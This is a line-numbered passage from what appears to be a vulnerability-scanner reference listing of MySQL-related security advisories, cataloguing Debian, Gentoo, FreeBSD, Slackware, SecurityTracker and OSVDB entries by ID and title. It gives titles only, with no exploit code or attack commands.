22097| [61283] Debian Security Advisory DSA 1608-1 (mysql-dfsg-5.0)
22098| [60804] Gentoo Security Advisory GLSA 200804-04 (mysql)
22099| [60271] Debian Security Advisory DSA 1478-1 (mysql-dfsg-5.0)
22100| [60106] Debian Security Advisory DSA 1451-1 (mysql-dfsg-5.0)
22101| [60017] Slackware Advisory SSA:2007-348-01 mysql
22102| [59638] Debian Security Advisory DSA 1413-1 (mysql-dfsg, mysql-dfsg-5.0, mysql-dfsg-4.1)
22103| [59245] Gentoo Security Advisory GLSA 200711-25 (mysql)
22104| [58863] FreeBSD Ports: freeradius, freeradius-mysql
22105| [58545] Gentoo Security Advisory GLSA 200708-10 (mysql)
22106| [58261] Gentoo Security Advisory GLSA 200705-11 (MySQL)
22107| [57859] Gentoo Security Advisory GLSA 200608-09 (mysql)
22108| [57725] FreeBSD Ports: proftpd, proftpd-mysql
22109| [57576] FreeBSD Ports: proftpd, proftpd-mysql
22110| [57527] FreeBSD Ports: mysql-server
22111| [57526] FreeBSD Ports: mysql-server
22112| [57337] Debian Security Advisory DSA 1169-1 (mysql-dfsg-4.1)
22113| [57257] FreeBSD Ports: mysql-server
22114| [57167] Slackware Advisory SSA:2006-211-01 mysql
22115| [57109] Debian Security Advisory DSA 1112-1 (mysql-dfsg-4.1)
22116| [56964] Gentoo Security Advisory GLSA 200606-18 (pam_mysql)
22117| [56940] Gentoo Security Advisory GLSA 200606-13 (MySQL)
22118| [56924] Debian Security Advisory DSA 1092-1 (mysql-dfsg-4.1)
22119| [56861] Slackware Advisory SSA:2006-155-01 mysql
22120| [56850] FreeBSD Ports: mysql-server
22121| [56849] FreeBSD Ports: mysql-server
22122| [56833] Debian Security Advisory DSA 1079-1 (mysql-dfsg)
22123| [56789] Debian Security Advisory DSA 1073-1 (mysql-dfsg-4.1)
22124| [56788] Debian Security Advisory DSA 1071-1 (mysql)
22125| [56730] Slackware Advisory SSA:2006-129-02 mysql
22126| [56728] Gentoo Security Advisory GLSA 200605-13 (MySQL)
22127| [56714] FreeBSD Ports: mysql-server
22128| [55520] Debian Security Advisory DSA 833-2 (mysql-dfsg-4.1)
22129| [55514] Debian Security Advisory DSA 833-1 (mysql-dfsg-4.1)
22130| [55493] Debian Security Advisory DSA 829-1 (mysql)
22131| [55492] Debian Security Advisory DSA 831-1 (mysql-dfsg)
22132| [55164] Debian Security Advisory DSA 783-1 (mysql-dfsg-4.1)
22133| [54884] Gentoo Security Advisory GLSA 200503-19 (mysql)
22134| [54819] Gentoo Security Advisory GLSA 200501-33 (mysql)
22135| [54713] Gentoo Security Advisory GLSA 200410-22 (MySQL)
22136| [54659] Gentoo Security Advisory GLSA 200409-02 (MySQL)
22137| [54580] Gentoo Security Advisory GLSA 200405-20 (MySQL)
22138| [54483] FreeBSD Ports: proftpd, proftpd-mysql
22139| [54201] FreeBSD Ports: mysql-server
22140| [53776] Debian Security Advisory DSA 013-1 (mysql)
22141| [53755] Debian Security Advisory DSA 483-1 (mysql)
22142| [53750] Debian Security Advisory DSA 707-1 (mysql)
22143| [53666] Debian Security Advisory DSA 381-1 (mysql)
22144| [53595] Debian Security Advisory DSA 303-1 (mysql)
22145| [53585] Debian Security Advisory DSA 212-1 (mysql)
22146| [53481] Debian Security Advisory DSA 647-1 (mysql)
22147| [53251] Debian Security Advisory DSA 562-1 (mysql)
22148| [53230] Debian Security Advisory DSA 540-1 (mysql)
22149| [52466] FreeBSD Ports: exim, exim-ldap2, exim-mysql, exim-postgresql
22150| [52459] FreeBSD Ports: mysql-client
22151| [52419] FreeBSD Ports: mysql-scripts
22152| [52406] FreeBSD Ports: mysql-server
22153| [52375] FreeBSD Ports: mysql-server, mysql-client
22154| [52274] FreeBSD Ports: mysql-server
22155| [52273] FreeBSD Ports: mysql-server
22156| [52272] FreeBSD Ports: mysql-server
22157| [52271] FreeBSD Ports: mysql-server
22158| [52270] FreeBSD Ports: mysql-server
22159| [52233] FreeBSD Ports: mysql-scripts
22160| [52158] FreeBSD Ports: mysql-server
22161| [16093] MySQL Eventum Multiple flaws
22162| [12639] MySQL Authentication bypass through a zero-length password
22163| [10783] PCCS-Mysql User/Password Exposure
22164|
22165| SecurityTracker - https://www.securitytracker.com:
22166| [1028790] MySQL Multiple Bugs Let Remote Users Deny Service and Partially Access and Modify Data
22167| [1028449] MySQL Multiple Bugs Let Remote Authenticated Users Deny Service and Partially Access and Modify Data
22168| [1028004] MySQL Multiple Bugs Let Remote Authenticated Users Take Full Control or Deny Service and Let Local Users Access and Modify Data
22169| [1027829] MySQL Bug in UpdateXML() Lets Remote Authenticated Users Deny Service
22170| [1027828] MySQL Heap Overflow May Let Remote Authenticated Users Execute Arbitrary Code
22171| [1027827] MySQL Stack Overflow May Let Remote Authenticated Users Execute Arbitrary Code
22172| [1027665] MySQL Multiple Bugs Let Remote Authenticated Users Access and Modify Data and Deny Service and Local Users Access Data
22173| [1027263] MySQL Multiple Bugs Let Remote Authenticated Users Deny Service
22174| [1027143] MySQL memcmp() Comparison Error Lets Remote Users Bypass Authentication
22175| [1026934] MySQL Multiple Bugs Let Remote Users Deny Service
22176| [1026896] MySQL Unspecified Flaws Have Unspecified Impact
22177| [1026659] MySQL Unspecified Flaw Lets Remote Users Execute Arbitrary Code
22178| [1026530] MySQL Multiple Bugs Let Local and Remote Users Partially Access and Modifiy Data and Partially Deny Service
22179| [1024508] MySQL Replication Flaw Lets Remote Authenticated Users Gain Elevated Privileges
22180| [1024507] MySQL Multiple Flaws Let Remote Authenticated Users Deny Service
22181| [1024360] MySQL Multiple Flaws Let Remote Authenticated Users Deny Service
22182| [1024160] MySQL ALTER DATABASE Processing Error Lets Remote Authenticated Users Deny Service
22183| [1024033] MySQL COM_FIELD_LIST Packet Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code
22184| [1024032] MySQL Large Packet Processing Flaw in my_net_skip_rest() Lets Remote Users Deny Service
22185| [1024031] MySQL COM_FIELD_LIST Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
22186| [1024004] MySQL mi_delete_table() Symlink Flaw Lets Remote Authenticated Users Delete Data and Index Files
22187| [1023402] MySQL Unspecified Flaw Lets Remote Users Execute Arbitrary Code
22188| [1023220] MySQL Client Fails to Check Server Certificates in Certain Cases
22189| [1022812] MySQL Unspecified Buffer Overflow Lets Remote Users Execute Arbitrary Code
22190| [1022533] MySQL Format String Bug in dispatch_command() Lets Remote Users Deny Service
22191| [1022482] MySQL Connector/Net is Missing SSL Certificate Validation
22192| [1021786] MySQL Bug in ExtractValue()/UpdateXML() in Processing XPath Expressions Lets Remote Authenticated Users Deny Service
22193| [1021714] (Red Hat Issues Fix) mod_auth_mysql Input Validation Flaw Lets Remote Users Inject SQL Commands
22194| [1020858] MySQL Item_bin_string::Item_bin_string() Binary Value Processing Bug Lets Remote Authenticated Users Deny Service
22195| [1019995] MySQL MyISAM Options Let Local Users Overwrite Table Files
22196| [1019085] MySQL Bugs Let Remote Authenticated Users Gain Elevated Privileges and Deny Service
22197| [1019084] MySQL DATA DIRECTORY and INDEX DIRECTORY Options May Let Remote Authenticated Users Gain Elevated Privileges
22198| [1019083] MySQL BINLOG Filename Path Bug May Let Remote Authenticated Users Gain Elevated Privileges
22199| [1019060] MySQL Rename Table Bug Lets Remote Authenticated Users Modify System Table Information
22200| [1018978] MySQL convert_search_mode_to_innobase() Bug Lets Remote Authenticated Users Deny Service
22201| [1018824] Asterisk-Addons Input Validation Flaw in cdr_addon_mysql Lets Remote Users Inject SQL Commands
22202| [1018663] MySQL Table View Access Bug Lets Remote Authenticated Users Gain Elevated Privileges
22203| [1018629] MySQL Authentication Protocol Bug Lets Remote Users Deny Service
22204| [1018071] MySQL ALTER TABLE Function Lets Remote Authenticated Users Obtain Potentially Sensitive Information
22205| [1018070] MySQL SQL SECURITY INVOKER Routines Let Remote Authenticated Users Gain Elevated Privileges
22206| [1018069] MySQL Lets Remote Authenticated Users Issue the RENAME TABLE Command
22207| [1017746] MySQL Single Row Subselect Statements Let Remote Users Deny Service
22208| [1016790] MySQL Replication Error Lets Local Users Deny Service
22209| [1016710] MySQL Case-Sensitive Database Names May Let Users Access Restricted Databases
22210| [1016709] MySQL Error in Checking suid Routine Arguments May Let Users Gain Elevated Privileges
22211| [1016617] MySQL MERGE Access Control Error May Let Users Access a Restricted Table
22212| [1016566] Opsware Network Automation System Discloses MySQL Password to Local Users
22213| [1016216] MySQL Error in Parsing Multibyte Encoded Data in mysql_real_escape() Lets Remote Users Inject SQL Commands
22214| [1016077] Apple MySQL Manager Database Initialization Bug May Let Local Users Access the Database
22215| [1016017] MySQL Anonymous Login Processing May Disclose Some Memory Contents to Remote Users
22216| [1016016] MySQL COM_TABLE_DUMP Processing Lets Remote Authenticated Users Execute Arbitrary Code or Obtain Information
22217| [1015789] Woltlab Burning Board Input Validation Hole in 'class_db_mysql.php' Permits Cross-Site Scripting Attacks
22218| [1015693] MySQL Query Bug Lets Remote Users Bypass Query Logging
22219| [1015603] PAM-MySQL pam_get_item() Double Free May Let Remote Users Execute Arbitrary Code
22220| [1015485] PHP mysqli Extension Error Mode Format String Flaw May Let Users Execute Arbitrary Code
22221| [1014603] MySQL Eventum Input Validation Hole in 'class.auth.php' Permits SQL Injection and Other Input Validation Bugs Permit Cross-Site Scripting Attacks
22222| [1014172] xMySQLadmin Lets Local Users Delete Files
22223| [1013995] MySQL 'mysql_install_db' Uses Unsafe Temporary Files and May Let Local Users Gain Elevated Privilege
22224| [1013994] MySQL Non-existent '--user' Error May Allow the Database to Run With Incorrect Privileges
22225| [1013415] MySQL CREATE FUNCTION Lets Authenticated Users Invoke libc Functions to Execute Arbitrary Code
22226| [1013414] MySQL udf_init() Path Validation Flaw Lets Authenticated Users Execute Arbitrary Libraries
22227| [1013413] MySQL CREATE TEMPORARY TABLE Uses Predictable Temporary Files That May Let Users Gain Elevated Privileges
22228| [1012914] MySQL 'mysqlaccess.sh' Unsafe Temporary Files May Let Local Users Gain Elevated Privileges
22229| [1012893] MySQL MaxDB Buffer Overflow in websql Password Parameter Lets Remote Users Execute Arbitrary Code
22230| [1012500] mysql_auth Memory Leak Has Unspecified Impact
22231| [1011741] MySQL Access Control Error in Databases With Underscore Wildcard Character May Grant Unauthorized Access
22232| [1011606] MySQL May Let Remote Authenticated Users Access Restricted Tables or Crash the System
22233| [1011408] MySQL libmysqlclient Buffer Overflow in Executing Prepared Statements Has Unspecified Impact
22234| [1011376] MySQLGuest Lack of Input Validation Lets Remote Users Conduct Cross-Site Scripting Attacks
22235| [1011008] MySQL Buffer Overflow in mysql_real_connect() May Let Remote Users Execute Arbitrary Code
22236| [1010979] MySQL 'mysqlhotcopy' Unsafe Temporary Files May Let Local Users Gain Elevated Privileges
22237| [1010645] MySQL check_scramble_323() Zero-Length Comparison Lets Remote Users Bypass Authentication
22238| [1009784] MySQL 'mysqld_multi' Temporary File Flaw Lets Local Users Overwrite Files
22239| [1009554] MySQL 'mysqlbug' Temporary File Flaw Lets Local Users Overwrite Files
22240| [1007979] MySQL mysql_change_user() Double Free Error Lets Remote Authenticated Users Crash mysqld
22241| [1007673] MySQL acl_init() Buffer Overflow Permits Remote Authenticated Administrators to Execute Arbitrary Code
22242| [1007518] DWebPro Discloses MySQL Database Password to Local Users
22243| [1007312] MySQL World-Writable Configuration File May Let Local Users Gain Root Privileges
22244| [1006976] MySQL Buffer Overflow in 'mysql_real_connect()' Client Function May Let Remote or Local Users Execute Arbitrary Code
22245| [1005800] MySQL Overflow and Authentication Bugs May Let Remote Users Execute Code or Access Database Accounts
22246| [1005345] MySQL Buffer Overflow Lets Local Users Gain System Privileges on Windows NT
22247| [1004506] vBulletin PHP-based Forum Software Has Unspecified Security Flaw in the 'db_mysql.php' Module
22248| [1004172] PHP-Survey Script Discloses Underlying MySQL Database Username and Password to Remote Users
22249| [1003955] 3rd Party Patch for Cyrus SASL ('auxprop for mysql and ldap') Lets Remote Users Access Protected POP Mail Accounts Without Authentication
22250| [1003290] Conectiva Linux MySQL Distribution May Allow Local Users to Obtain Sensitive Information
22251| [1002993] PurePostPro Script Add-on for PureFTPd and MySQL Allows Remote Users to Execute SQL Commands on the Server
22252| [1002485] WinMySQLadmin Database Administration Tool Discloses MySQL Password to Local Users
22253| [1002324] Vpopmail Mail Server Discloses Database Password to Local Users When Installed with MySQL
22254| [1001411] phpMyAdmin Administration Tool for MySQL Allows Remote Users to Execute Commands on the Server
22255| [1001118] MySQL Database Allows Authorized Users to Modify Server Files to Deny Service or Obtain Additional Access
22256|
22257| OSVDB - http://www.osvdb.org:
22258| [95337] Oracle MySQL Server XA Transactions Subcomponent Unspecified Remote DoS
22259| [95336] Oracle MySQL Server Replication Subcomponent Unspecified Remote DoS
22260| [95335] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
22261| [95334] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue
22262| [95333] Oracle MySQL Server Partition Subcomponent Unspecified Remote DoS
22263| [95332] Oracle MySQL Server Parser Subcomponent Unspecified Remote DoS
22264| [95331] Oracle MySQL Server Options Subcomponent Unspecified Remote DoS (2013-3801)
22265| [95330] Oracle MySQL Server Options Subcomponent Unspecified Remote DoS (2013-3808)
22266| [95329] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2013-3796)
22267| [95328] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2013-3804)
22268| [95327] Oracle MySQL Server Prepared Statements Subcomponent Unspecified Remote DoS
22269| [95326] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
22270| [95325] Oracle MySQL Server Full Text Search Subcomponent Unspecified Remote DoS
22271| [95324] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-3795)
22272| [95323] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-3793)
22273| [95322] Oracle MySQL Server Audit Log Subcomponent Unspecified Remote Issue
22274| [95321] Oracle MySQL Server MemCached Subcomponent Unspecified Remote Issue
22275| [95131] AutoMySQLBackup /usr/sbin/automysqlbackup Database Name Arbitrary Code Injection
22276| [94076] Debian Linux MySQL Server mysql-server-5.5.postinst Race Condition debian.cnf Plaintext Credential Local Disclosure
22277| [93505] Wireshark MySQL Dissector (packet-mysql.c) Malformed Packet Handling Infinite Loop Remote DoS
22278| [93174] MySQL Crafted Derived Table Handling DoS
22279| [92967] MySQL2JSON (mn_mysql2json) Extension for TYPO3 Unspecified SQL Injection
22280| [92950] MySQL Running START SLAVE Statement Process Listing Plaintext Local Password Disclosure
22281| [92485] Oracle MySQL Server Partition Subcomponent Unspecified Local DoS
22282| [92484] Oracle MySQL Server Locking Subcomponent Unspecified Remote DoS (2013-1506)
22283| [92483] Oracle MySQL Server Install Subcomponent Unspecified Local Issue
22284| [92482] Oracle MySQL Server Types Subcomponent Unspecified Remote DoS
22285| [92481] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue (2013-2381)
22286| [92480] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-1566)
22287| [92479] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-1511)
22288| [92478] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-1567)
22289| [92477] Oracle MySQL Server Stored Procedure Subcomponent Unspecified Remote DoS
22290| [92476] Oracle MySQL Server Replication Subcomponent Unspecified Remote DoS
22291| [92475] Oracle MySQL Server Partition Subcomponent Unspecified Remote DoS
22292| [92474] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS
22293| [92473] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-2389)
22294| [92472] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote DoS
22295| [92471] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-1512)
22296| [92470] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-1544)
22297| [92469] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote Issue
22298| [92468] Oracle MySQL Server MemCached Subcomponent Unspecified Remote DoS
22299| [92467] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue (2013-2375)
22300| [92466] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue (2013-1531)
22301| [92465] Oracle MySQL Server Server Subcomponent Unspecified Remote Issue
22302| [92464] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote Issue
22303| [92463] Oracle MySQL Server Locking Subcomponent Unspecified Remote Issue (2013-1521)
22304| [92462] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-2395)
22305| [91536] Oracle MySQL yaSSL Unspecified Overflow (2012-0553)
22306| [91534] Oracle MySQL yaSSL Unspecified Overflow (2013-1492)
22307| [91415] MySQL Raw Geometry Object String Conversion Remote DoS
22308| [91108] Juju mysql Charm Install Script mysql.passwd MySQL Password Plaintext Local Disclosure
22309| [89970] Site Go /site-go/admin/extra/mysql/index.php idm Parameter Traversal Arbitrary File Access
22310| [89265] Oracle MySQL Server Server Privileges Subcomponent Unspecified Remote DoS
22311| [89264] Oracle MySQL Server Server Partition Subcomponent Unspecified Remote DoS
22312| [89263] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-0578)
22313| [89262] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-1705)
22314| [89261] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-0574)
22315| [89260] Oracle MySQL Server MyISAM Subcomponent Unspecified Remote DoS
22316| [89259] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2012-0572)
22317| [89258] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-0368)
22318| [89257] Oracle MySQL Server Server Locking Subcomponent Unspecified Remote DoS
22319| [89256] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-1702)
22320| [89255] Oracle MySQL Server Server Replication Subcomponent Unspecified Remote Issue
22321| [89254] Oracle MySQL Server Server Replication Subcomponent Unspecified Local Issue
22322| [89253] Oracle MySQL Server Stored Procedure Subcomponent Unspecified Remote DoS
22323| [89252] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS
22324| [89251] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote DoS
22325| [89250] Oracle MySQL Server GIS Extension Subcomponent Unspecified Remote DoS
22326| [89042] ViciBox Server MySQL cron Service Default Credentials
22327| [88415] Oracle MySQL Server COM_CHANGE_USER Account Password Brute-Force Weakness
22328| [88118] Oracle MySQL Server FILE Privilege Database Privilege Escalation
22329| [88067] Oracle MySQL Server Authentication Error Message User Enumeration
22330| [88066] Oracle MySQL Server for Linux Access Rights Checking Routine Database Name Handling Stack Buffer Overflow
22331| [88065] Oracle MySQL Server COM_BINLOG_DUMP Invalid Data Handling DoS
22332| [88064] Oracle MySQL Server Multiple-Table DELETE Heap Buffer Overflow
22333| [87704] CodeIgniter MySQL / MySQLi Driver Database Client Multi-byte Character Set Unspecified SQL Injection
22334| [87507] Oracle MySQL Statement Logging Multiple Log Plaintext Local Password Disclosure
22335| [87501] Oracle MySQL optimizer_switch Malformed Value Processing Local DoS
22336| [87494] Oracle MySQL on Windows Field_new_decimal::store_value dbug_buff Variable Overflow DoS
22337| [87480] MySQL Malformed XML Comment Handling DoS
22338| [87466] MySQL SSL Certificate Revocation Weakness
22339| [87356] Oracle MySQL do_div_mod DIV Expression Handling Remote DoS
22340| [87355] Oracle MySQL handler::pushed_cond Table Cache Handling mysqld DoS
22341| [87354] Oracle MySQL Polygon Union / Intersection Spatial Operations DoS
22342| [86273] Oracle MySQL Server Server Installation Subcomponent Unspecified Local Information Disclosure
22343| [86272] Oracle MySQL Server Server Replication Subcomponent Unspecified Remote DoS
22344| [86271] Oracle MySQL Server Server Full Text Search Subcomponent Unspecified Remote DoS
22345| [86270] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-3156)
22346| [86269] Oracle MySQL Server MySQL Client Subcomponent Unspecified Remote Information Disclosure
22347| [86268] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-3180)
22348| [86267] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-3150)
22349| [86266] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-3144)
22350| [86265] Oracle MySQL Server InnoDB Plugin Subcomponent Unspecified Remote DoS
22351| [86264] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
22352| [86263] Oracle MySQL Server MySQL Client Subcomponent Unspecified Remote Issue
22353| [86262] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-3177)
22354| [86261] Oracle MySQL Server Protocol Subcomponent Unspecified Remote Issue
22355| [86260] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote Code Execution
22356| [86175] Oracle MySQL on Windows Path Subversion Arbitrary DLL Injection Code Execution
22357| [85155] Icinga module/idoutils/db/scripts/create_mysqldb.sh Icinga User Database Access Restriction Bypass
22358| [84755] Oracle MySQL Sort Order Index Calculation Remote DoS
22359| [84719] MySQLDumper index.php page Parameter XSS
22360| [84680] MySQL Squid Access Report access.log File Path XSS
22361| [83980] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2012-1689)
22362| [83979] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2012-1734)
22363| [83978] Oracle MySQL Server Subcomponent Unspecified Remote DoS
22364| [83977] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
22365| [83976] Oracle MySQL Server GIS Extension Subcomponent Unspecified Remote DoS
22366| [83975] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2012-1735)
22367| [83661] Oracle MySQL Unspecified Issue (59533)
22368| [82804] Oracle MySQL Authentication Protocol Token Comparison Casting Failure Password Bypass
22369| [82803] Oracle MySQL Unspecified Issue (59387)
22370| [82120] Oracle MySQL Version Specific Comment Handling Arbitrary SQL Command Execution
22371| [81897] Viscacha classes/database/mysql.inc.php Multiple Parameter SQL Injection
22372| [81616] MySQLDumper Multiple Script Direct Request Information Disclosure
22373| [81615] MySQLDumper filemanagement.php f Parameter Traversal Arbitrary File Access
22374| [81614] MySQLDumper File Upload PHP Code Execution
22375| [81613] MySQLDumper main.php Multiple Function CSRF
22376| [81612] MySQLDumper restore.php filename Parameter XSS
22377| [81611] MySQLDumper sql.php Multiple Parameter XSS
22378| [81610] MySQLDumper install.php Multiple Parameter XSS
22379| [81609] MySQLDumper install.php language Parameter Traversal Arbitrary File Access
22380| [81378] Oracle MySQL Server Server Optimizer Component Unspecified Remote DoS (2012-1690)
22381| [81377] Oracle MySQL Server Server Optimizer Component Unspecified Remote DoS (2012-1696)
22382| [81376] Oracle MySQL Server Server DML Component Unspecified Remote DoS
22383| [81375] Oracle MySQL Server Partition Component Unspecified Remote DoS
22384| [81374] Oracle MySQL Server MyISAM Component Unspecified Remote DoS
22385| [81373] Oracle MySQL Server Server Optimizer Component Unspecified Remote DoS (2012-1703)
22386| [81059] Oracle MySQL Server Multiple Unspecified Issues
22387| [79038] Webmin Process Listing MySQL Password Local Disclosure
22388| [78919] Oracle MySQL Unspecified Pre-authentication Remote Code Execution
22389| [78710] WordPress wp-admin/setup-config.php MySQL Query Saturation Brute-Force Proxy Weakness
22390| [78708] WordPress wp-admin/setup-config.php MySQL Database Verification Code Injection Weakness
22391| [78707] WordPress wp-admin/setup-config.php MySQL Credentials Error Message Brute-Force Weakness
22392| [78394] Oracle MySQL Server Unspecified Remote DoS (2012-0493)
22393| [78393] Oracle MySQL Server Unspecified Remote DoS (2012-0492)
22394| [78392] Oracle MySQL Server Unspecified Remote DoS (2012-0117)
22395| [78391] Oracle MySQL Server Unspecified Remote DoS (2012-0112)
22396| [78390] Oracle MySQL Server Unspecified Remote DoS (2012-0495)
22397| [78389] Oracle MySQL Server Unspecified Remote DoS (2012-0491)
22398| [78388] Oracle MySQL Server Unspecified Remote DoS (2012-0490)
22399| [78387] Oracle MySQL Server Unspecified Remote DoS (2012-0489)
22400| [78386] Oracle MySQL Server Unspecified Remote DoS (2012-0488)
22401| [78385] Oracle MySQL Server Unspecified Remote DoS (2012-0487)
22402| [78384] Oracle MySQL Server Unspecified Remote DoS (2012-0486)
22403| [78383] Oracle MySQL Server Unspecified Remote DoS (2012-0485)
22404| [78382] Oracle MySQL Server Unspecified Remote DoS (2012-0120)
22405| [78381] Oracle MySQL Server Unspecified Remote DoS (2012-0119)
22406| [78380] Oracle MySQL Server Unspecified Remote DoS (2012-0115)
22407| [78379] Oracle MySQL Server Unspecified Remote DoS (2012-0102)
22408| [78378] Oracle MySQL Server Unspecified Remote DoS (2012-0101)
22409| [78377] Oracle MySQL Server Unspecified Remote DoS (2012-0087)
22410| [78376] Oracle MySQL Server Unspecified Remote DoS (2011-2262)
22411| [78375] Oracle MySQL Server Unspecified Local DoS
22412| [78374] Oracle MySQL Server Unspecified Remote Issue (2012-0075)
22413| [78373] Oracle MySQL Server Unspecified Local Issue
22414| [78372] Oracle MySQL Server Unspecified Remote Information Disclosure
22415| [78371] Oracle MySQL Server Unspecified Remote Issue (2012-0496)
22416| [78370] Oracle MySQL Server Unspecified Remote Issue (2012-0118)
22417| [78369] Oracle MySQL Server Unspecified Remote Issue (2012-0116)
22418| [78368] Oracle MySQL Server Unspecified Remote Issue (2012-0113)
22419| [78283] Oracle MySQL NULL Pointer Dereference Packet Parsing Remote DoS
22420| [77042] e107 CMS install_.php MySQL Server Name Parsing Remote PHP Code Execution
22421| [77040] DBD::mysqlPP Unspecified SQL Injection
22422| [75888] TaskFreak! multi-mysql Multiple Script Direct Request Path Disclosure
22423| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
22424| [73555] Prosody MySQL Value Column Invalid Data Type Handling DoS
22425| [73387] Zend Framework PDO_MySql Character Set Security Bypass
22426| [72836] Arctic Fox CMS Multiple Script Direct Request MySQL Settings Disclosure
22427| [72660] MySQL GUI Tools Administrator / Query Browser Command Line Credentials Local Disclosure
22428| [72120] DirectAdmin mysql_backups Folder MySQL Database Backup Local Disclosure
22429| [71368] Accellion File Transfer Appliance Weak MySQL root Password
22430| [70967] MySQL Eventum Admin User Creation CSRF
22431| [70966] MySQL Eventum preferences.php full_name Parameter XSS
22432| [70961] MySQL Eventum list.php Multiple Parameter XSS
22433| [70960] MySQL Eventum forgot_password.php URI XSS
22434| [70947] PyWebDAV DAVServer/mysqlauth.py get_userinfo() Multiple Parameter SQL Injection
22435| [70610] PHP MySQLi Extension set_magic_quotes_runtime Function mysqli_fetch_assoc Function Interaction Weakness
22436| [69885] SilverStripe modules/sapphire/trunk/core/model/MySQLDatabase.php showqueries Parameter SQL Command Disclosure
22437| [69395] MySQL Derived Table Grouping DoS
22438| [69394] MySQL Temporary Table Expression Re-Evaluation DoS
22439| [69393] MySQL GROUP_CONCAT() WITH ROLLUP Modifier DoS
22440| [69392] MySQL Extreme-Value Functions Mixed Arguments DoS
22441| [69391] MySQL Stored Procedures / Prepared Statements Nested Joins DoS
22442| [69390] MySQL Extreme-Value Functions Argument Parsing Type Error DoS
22443| [69389] MySQL CONVERT_TZ() Function Empty SET Column DoS
22444| [69388] MySQL InnoDB Storage Engine Table Handling Overflow
22445| [69387] MySQL LIKE Predicates Pre-Evaluation DoS
22446| [69001] MySQL PolyFromWKB() Function WKB Data Remote DoS
22447| [69000] MySQL HANDLER Interface Unspecified READ Request DoS
22448| [68997] MySQL Prepared-Statement Mode EXPLAIN DoS
22449| [68996] MySQL EXPLAIN EXTENDED Statement DoS
22450| [68995] MySQL GeometryCollection non-Geometry Value Assignment DoS
22451| [67488] phpMyAdmin libraries/dbi/mysqli.dbi.lib.php Unspecified Parameter XSS
22452| [67487] phpMyAdmin libraries/dbi/mysql.dbi.lib.php Unspecified Parameter XSS
22453| [67421] PHP Mysqlnd Extension mysqlnd_wireprotocol.c php_mysqlnd_rset_header_read Function Overflow
22454| [67420] PHP Mysqlnd Extension mysqlnd_wireprotocol.c php_mysqlnd_ok_read Function Arbitrary Memory Content Disclosure
22455| [67419] PHP Mysqlnd Extension php_mysqlnd_read_error_from_line Function Negative Buffer Length Value Overflow
22456| [67418] PHP Mysqlnd Extension php_mysqlnd_auth_write Function Multiple Overflows
22457| [67384] MySQL LOAD DATA INFILE Statement Incorrect OK Packet DoS
22458| [67383] MySQL EXPLAIN Statement Item_singlerow_subselect::store Function NULL Dereference DoS
22459| [67381] MySQL InnoDB Temporary Table Handling DoS
22460| [67380] MySQL BINLOG Statement Unspecified Argument DoS
22461| [67379] MySQL Multiple Operation NULL Argument Handling DoS
22462| [67378] MySQL Unique SET Column Join Statement Remote DoS
22463| [67377] MySQL DDL Statement Multiple Configuration Parameter DoS
22464| [66800] PHP Multiple mysqlnd_* Function Unspecified Overflow
22465| [66799] PHP mysqlnd Error Packet Handling Multiple Overflows
22466| [66731] PHP Bundled MySQL Library Unspecified Issue
22467| [66665] PHP MySQL LOAD DATA LOCAL open_basedir Bypass
22468| [65851] MySQL ALTER DATABASE #mysql50# Prefix Handling DoS
22469| [65450] phpGraphy mysql_cleanup.php include_path Parameter Remote File Inclusion
22470| [65085] MySQL Enterprise Monitor Unspecified CSRF
22471| [64843] MySQL DROP TABLE Command Symlink MyISAM Table Local Data Deletion
22472| [64588] MySQL sql/net_serv.cc my_net_skip_rest Function Large Packet Handling Remote DoS
22473| [64587] MySQL COM_FIELD_LIST Command Packet Table Name Argument Overflow
22474| [64586] MySQL COM_FIELD_LIST Command Packet Authentication Bypass
22475| [64524] Advanced Poll misc/get_admin.php mysql_host Parameter XSS
22476| [64447] Tirzen Framework (TZN) tzn_mysql.php Username Parameter SQL Injection Authentication Bypass
